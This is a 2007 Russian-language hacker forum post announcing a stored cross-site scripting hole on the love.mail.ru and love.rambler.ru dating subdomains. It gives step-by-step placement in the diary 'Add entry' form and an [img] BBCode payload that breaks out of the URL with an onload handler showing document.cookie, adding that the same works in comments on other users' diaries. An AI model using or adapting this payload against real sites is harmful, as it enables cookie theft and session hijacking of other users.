Показать сообщение отдельно

love.mail.ru / love.rambler.ru active XSS
  #11  
Старый 06.08.2007, 21:14
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию love.mail.ru / love.rambler.ru active XSS

Теперь все это добро тупо перекочевало и собственно на мыло.ру, а также на рамблер.ру

Активная XSS на поддоменах MAIL.RU и RAMBLER.RU

Моя страница - Вкладка "Дневник" - "Добавить запись"

Вставляем

PHP код:
[img]http://img.mail.ru/mail/ru/images/dumb.gif"onload="alert(document.cookie); [/img] 
С таким же успехом можно добавлять комментарии к записям в чужих дневниках.

Нет слов... Одни эмоции...